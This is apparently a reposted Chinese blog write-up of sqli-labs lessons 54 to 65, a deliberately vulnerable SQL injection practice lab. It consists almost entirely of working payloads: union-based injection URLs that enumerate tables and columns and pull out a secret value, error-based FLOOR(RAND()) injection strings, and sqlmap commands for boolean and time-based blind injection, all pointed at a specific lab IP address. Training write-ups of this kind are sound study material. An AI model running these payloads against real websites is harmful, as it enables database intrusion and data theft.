zoukankan      html  css  js  c++  java

  • sqlilab-Less-54-65-writeup

    Less-54 GET请求联合查询10步拿key 单引号

    进行联合查询注入的时候需要注意,前期判断是否成功闭合,判断字段数,都是要确保后台数据库存在字段id的编号,这里测试可以写ID=1,2,3 写其他数字看不到效果,然后开始查表名等其他后续操作就可以写个不存在的id编号即可

    判断闭合方式是否成功
    ?id=1'--+

    判断字段数
    ?id=1' order by 3--+
    ?id=1' order by 4--+

    确认可以注入的字段
    ?id=-1' union select 1,2,3 --+
    根据显示的结果是可以通过2和3查看

    查表名
    http://106.54.35.126/Less-54/?id=-1%27%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28table_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29%29%20--+

    显示结果:
    Your Login name:2
    Your Password:BROZHOX7ME

    查字段名
    http://106.54.35.126/Less-54/?id=-1%27%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28column_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x42524f5a484f58374d45%29--+

    BROZHOX7ME ---> 16进制42524f5a484f58374d45 在线转换:https://www.bejson.com/convert/ox2str/

    显示结果:
    Your Login name:2
    Your Password:id
    sessid
    secret_FDK5
    tryy

    查询字段值
    http://106.54.35.126/Less-54/?id=-1%27%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28secret_FDK5%29+FROM+BROZHOX7ME%29--+

    显示结果:
    Your Login name:2
    Your Password:oNf3esAKnoNVUbViCYCbGPzv

    Less-55 GET请求联合查询14步拿key 小括号

    跟Less-54一样的payload,拼合方式由单引号改成了小括号

    判断闭合方式是否成功
    ?id=1)--+

    http://106.54.35.126/Less-55/
    ?id=-1) union%20select%201,2,%28SELECT+GROUP_CONCAT%28table_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29%29%20--+

    其他操作跟Less-54一样


    Less-56 GET请求联合查询14步拿key 单引号 小括号

    判断闭合方式是否成功
    ?id=1')--+

    http://106.54.35.126/Less-56/?id=-1%27%29%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28table_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29%29%20--+

    其他操作跟Less-54一样


    Less-57 GET请求联合查询14步拿key 双引号

    判断闭合方式是否成功
    ?id=1"--+

    http://106.54.35.126/Less-57/?id=-1%22%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28table_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29%29%20--+


    Less-58 GET请求5步拿key 单引号

    此关卡不能使用联合查询,因为用户输出的数组且被逆序了,所以使用报错注入效果显著

    http://106.54.35.126/Less-58/?id=1%27+AND+%28SELECT+1+FROM+%28SELECT+COUNT%28*%29,CONCAT%28%28SELECT%28SELECT+CONCAT%28CAST%28CONCAT%28secret_FDK5%20%29+AS+CHAR%29,0x7e%29%29+FROM+BROZHOX7ME+LIMIT+0,1%29,FLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x%29a%29--+

    Less-59 GET请求5步拿key

    跟Less-58一样,拼合方式是整型,不加单引号

    http://106.54.35.126/Less-59/?id=1+AND+%28SELECT+1+FROM+%28SELECT+COUNT%28*%29,CONCAT%28%28SELECT%28SELECT+CONCAT%28CAST%28CONCAT%28secret_FDK5%20%29+AS+CHAR%29,0x7e%29%29+FROM+BROZHOX7ME+LIMIT+0,1%29,FLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x%29a%29--+

    Less-60 GET请求5步拿key

    跟Less-58一样,拼合方式是双引号和小括号

    http://106.54.35.126/Less-60/?id=1%22%29+AND+%28SELECT+1+FROM+%28SELECT+COUNT%28*%29,CONCAT%28%28SELECT%28SELECT+CONCAT%28CAST%28CONCAT%28secret_FDK5%20%29+AS+CHAR%29,0x7e%29%29+FROM+BROZHOX7ME+LIMIT+0,1%29,FLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x%29a%29--+

    Less-61 GET请求5步拿key

    跟Less-58一样,拼合方式是单引号和双小括号

    http://106.54.35.126/Less-61/?id=1%27%29%29+AND+%28SELECT+1+FROM+%28SELECT+COUNT%28*%29,CONCAT%28%28SELECT%28SELECT+CONCAT%28CAST%28CONCAT%28secret_FDK5%20%29+AS+CHAR%29,0x7e%29%29+FROM+BROZHOX7ME+LIMIT+0,1%29,FLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x%29a%29--+

    Less-62 GET请求5步拿key

    跟Less-58一样,但是把显错取消, 所以这里只能布尔型盲注和时间延时盲注,拼合方式是单引号和一个小括号

    使用sqlmap进行布尔型盲注

    python sqlmap.py -u http://106.54.35.126/Less-62/?id=1 --dbms=MySQL --random-agent --flush-session --technique=B -v 3 --level=3 --risk=3 --dbs --batch

    python sqlmap.py -u http://106.54.35.126/Less-62/?id=1 --dbms=MySQL --random-agent --flush-session --technique=T -v 3 --level=3 --risk=3 --dbs --batch

    Less-63 GET请求5步拿key

    跟Less-58一样,但是把显错取消, 所以这里只能布尔型盲注和时间延时盲注,拼合方式是单引号

    使用sqlmap进行布尔型盲注

    python sqlmap.py -u http://106.54.35.126/Less-63/?id=1 --dbms=MySQL --random-agent --flush-session --technique=B -v 3 --level=3 --risk=3 --dbs --batch

    Less-64 GET请求5步拿key

    跟Less-58一样,但是把显错取消, 所以这里只能布尔型盲注和时间延时盲注,拼合方式是双小括号

    使用sqlmap进行布尔型盲注

    python sqlmap.py -u http://106.54.35.126/Less-64/?id=1 --dbms=MySQL --random-agent --flush-session --technique=B -v 3 --level=3 --risk=3 --dbs --batch

    Less-65 GET请求5步拿key

    跟Less-58一样,但是把显错取消, 所以这里只能布尔型盲注和时间延时盲注,拼合方式是单引号和小括号

    使用sqlmap进行布尔型盲注

    python sqlmap.py -u http://106.54.35.126/Less-65/?id=1 --dbms=MySQL --random-agent --flush-session --technique=B -v 3 --level=3 --risk=3 --dbs --batch

    迷茫的人生,需要不断努力,才能看清远方模糊的志向!
  • 相关阅读:
    88. Merge Sorted Array
    87. Scramble String
    86. Partition List
    85. Maximal Rectangle
    84. Largest Rectangle in Histogram
    83. Remove Duplicates from Sorted List
    82. Remove Duplicates from Sorted List II
    81. Search in Rotated Sorted Array II
    80. Remove Duplicates from Sorted Array II
    计算几何——点线关系(叉积)poj2318
  • 原文地址:https://www.cnblogs.com/autopwn/p/13730992.html
Copyright © 2011-2022 走看看